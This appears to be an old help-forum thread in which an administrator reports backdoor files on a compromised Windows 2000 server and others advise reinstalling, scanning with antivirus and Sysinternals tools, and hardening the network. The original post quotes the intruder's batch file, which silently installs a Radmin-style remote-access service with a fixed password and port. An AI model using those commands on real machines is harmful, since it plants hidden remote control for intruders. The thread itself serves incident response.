Anyone know how to remove and verify these hacking tools are gone?

[Kent P. Iler]

Hi,

We had a directory under c:\winnt\system32\ named OS2. It had a buch of
files like:
ndde.exe, nbthlp.exe, lssvc.exe, list.exe.

There looks like there was also a batch file with these commands in it:

regedit /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:Hack3d /port:5100 /save /silence
nvsvc.exe /start /silence
net start r_server

How can I check for installed services that are supposed to be running
silently? I'm concerned there are still backdoors on this server.

Thanks.

-- Kent Iler

 

[Steven L Umbach]

The only real way is to reinstall the operating system from scratch and
harden it and your network to prevent the same from happening again. but
there are some things you can try. First of course is to run an antivirus
program with the latest definitions and also run a parasite detection
removal program such as AdAware SE. Trend Micro has a great stand alone
utility that also scans for and removes many common malwares. Just download
Sysclean and the pattern file into the a folder to run from. Note that it is
not unusual for an antivirus program to report nothing found when a second
opinion will find a problem. Pest Patrol is also very good at finding a LOT
of stuff on a computer such as trojans and keyboard loggers.

http://www.trendmicro.com/download/dcs.asp -- Sysclean malware detection
and removal.
http://www.trendmicro.com/download/pattern.asp -- this is updated often
http://www.microsoft.com/technet/security/chklist/w2ksvrcl.mspx -- good
tips from Microsoft on how to harden your computer.
http://www.pestpatrol.com/ -- Pest Patrol [now owned by Computer
Associates]

SysInternals provides some great free tools to help analyze your computer to
see if rouge processes are running. In particular download TCPView, Process
Explorer, Autoruns, and PsList. TCPView will show what ports you computer is
using and the associated process/executable, Process Explorer will give much
more detailed info about processes and if you view a processes properties it
will show the associated services and tcp/ip usage, Autoruns will show
startup programs in various places on the computer and let you disable them,
and PsList is a command line process viewer which you should use to view
running processes locally and when shown from a remote computer to compare
the results. A hidden service or root kit infection may not show when
processes are enumerated locally but they will when shown from another
computer on the network, which you can do with PsList. If you do find a
hidden process that can not be remove by normal means you might try scanning
the computer from another computer on the network or even one of the free
online services. --- Steve

http://www.sysinternals.com/ntw2k/freeware/pslist.shtml -- PsList
http://www.sysinternals.com/ntw2k/source/tcpview.shtml -- TCPView and
SysInternals website.

 

[Lanwench [MVP - Exchange]]

I agree with Steven. If your server has been compromised, reinstall it from
scratch.

More info would be needed in order to figure out how this happened. Your
network needs a good firewall that blocks inbound traffic you don't want
coming in. Did you have FTP access open inbound? Do you have good antivirus
software? Auditing enabled? All servers & workstations patched with the
latest patches/hotfixes? Do you allow anyone to come in & plug in their own
laptop on your network? Etc etc etc.